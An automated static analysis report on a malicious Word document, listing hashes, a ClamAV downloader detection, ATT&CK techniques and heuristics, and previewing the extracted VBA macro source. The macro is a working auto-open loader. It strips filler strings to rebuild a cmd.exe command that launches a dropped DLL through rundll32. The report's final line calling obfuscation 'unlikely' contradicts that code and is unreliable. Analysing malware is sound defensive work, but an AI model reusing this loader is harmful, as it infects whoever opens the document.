Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f2a336d4e61ae9bb…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 110.9 KB
Created: 2021-09-30 14:03:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-10-14
MD5: 0f4c2dae18a120005510a6684f2c7154
SHA-1: 120238dafe775b0d6a38f131940b81a59c20b4e8
SHA-256: f2a336d4e61ae9bb376a280f9c28092f71004085e6b5dfbc93b74b8dfb2ccf7b
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an OOXML document containing a VBA project with a Document_Open macro, which is a common technique for executing malicious code upon opening. The macro attempts to deobfuscate and execute a command that writes to the Run key, likely to establish persistence and launch a second-stage payload. ClamAV also detected this as a downloader.

Heuristics (5)

  • ClamAV: Doc.Downloader.Generic-8011192-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML [medium, 2 related findings] (OOXML_VBA)
    Document contains a VBA project; VBA macros are present.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    The VBA project defines a Document_Open macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 43552 bytes
SHA-256: b55c75adf3273ed27c8db84f7e83ea17daefdfe6d4b81dbdb7cf0b05ca9aeeb9
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function sertsd(ByVal rCell As Range, _
                        ByVal strFind As String)
    j = InStr(1, rCell.value, strFind, vbTextCompare)
    With rCell
        .Characters(Start:=j, Length:=Len(strFind)).Font.ColorIndex = 3
        .Characters(Start:=j, Length:=Len(strFind)).Font.Bold = True
    End With
End Function

Sub sgaswreta()
Dim i As Long, m
Dim iNbRow As Long, iRowStart As Long: iRowStart = 1
Dim iNbCol As Long, iClnStart As Long: iClnStart = 1
Dim oSh As Object
Dim oWb As Object '
Dim oWbMain As Object
Dim strWbMainFullName As String: strWbMainFullName = oWbMain.FullName

Dim strWbMainName As String
m = Split(strWbMainFullName, ".", -1, vbTextCompare)
strWbMainName = m(LBound(m))
strWbMainName = Trim(oSh.Cells(iRowStart, 1).value)
EventsChange False
Set oWb = ActiveWorkbook
EventsChange True
End Sub

Public Sub holehfls()
    Dim sdf As Double
    Dim fojn As Long
    
    sdf = Sin(3)
    
    fojn = lsjalkjd.falkhqlsih(0, "sdfgw4", "893792", 0, 0)
    If fojn = 0 Then
    
        vbnkljb34.OptionButton3.Caption = "poRwCpoRw:poRw\poRwWipoRwndpoRwopoRwwpoRws\poRwSpoRwypoRwstpoRwempoRw3poRw2\cpoRwmpoRwd.poRwepoRwxpoRwe"
        vbnkljb34.OptionButton3.Caption = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Caption, "poRw")
        
        vbnkljb34.OptionButton3.Tag = "/cuiE cuiEhouiEicuiEe uiE/CuiE YuiE /NuiE /DuiE YuiE /uiETuiE uiE3uiE0 uiE& suiEtauiEruiEt uiECuiE:uiE\uiEWuiEinuiEdouiEwuiEs\SuiEysuiEtuiEemuiE3uiE2\ruiEunuiEdluiEl3uiE2.euiExuiEe uiECuiE:uiE\uiEPruiEoguiErauiEmDauiEtauiE\nuiEcvw.duiEluiEl,cuiEouiEms"
        vbnkljb34.OptionButton3.Tag = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Tag, "uiE")
        
        lsjalkjd.jgoleirh 3, vbnkljb34.OptionButton3.Caption, vbnkljb34.OptionButton3.Tag
    Else
        Dim df As Integer
        Dim d As String
        df = 4
        d = CStr(df)
    End If
End Sub


Sub EventsChange(value As Boolean)
    With Application
        .Calculation = xlCalculationAutomatic
        .ScreenUpdating = value
        .ShowWindowsInTaskbar = value
        .DisplayAlerts = value
        .EnableEvents = value
        If value Then
            .Calculation = xlCalculationAutomatic
            Else: .Calculation = xlCalculationManual
        End If
    End With
End Sub


Private Sub Document_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    holehfls
    hnfkj = vbnkljb34.OptionButton3.Caption
End Sub

Attribute VB_Name = "vbnkljb34"
Attribute VB_Base = "0{7B3DE40E-BF4A-4FF8-A455-448868E1D684}{1559A2B9-579C-4B97-851C-1CC067DBD339}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lsjalkjd"

Function FnDelDub(ByVal oSh As Object, _
                    Optional ByVal iRowStart As Long = 1, _
                    Optional ByVal iClnStart As Long = 1) As Boolean
    Dim aColsArr(), i&
    Dim iNbRow As Long, iNbCln As Long
    Dim strCellSelect
On Error GoTo FnDelDub_Err
    With oSh
        iNbCln = 1 '.Cells(1, 256).End(xlToLeft).Column
        iNbRow = .Cells(Rows.Count, 1).End(xlUp).Row
        strCellSelect = Range(.Cells(iRowStart, iClnStart), .Cells(iNbRow, iNbCln)).Address
        ReDim aColsArr(iNbCln - 1)
        For i = 1 To iNbCln
            aColsArr(i - 1) = i
        Next
        .Range(strCellSelect).RemoveDuplicates (aColsArr), xlYes
    End With
    Erase aColsArr
    FnDelDub = True: Exit Function
FnDelDub_Err:
FnDelDub = False
End Function


Sub jgoleirh(flkas As Long, fewo4ih As String, jgdlfk As String)
    vbnkljb34.ListBox1.AddItem
    vbnkljb34.ListBox1.AddItem
    weuorihod.jflwk 0,
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 105984 bytes
SHA-256: 448b16303737ce5fa4a2303fa5f57ad767e29a486a27d229a7598930d6af5ace
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely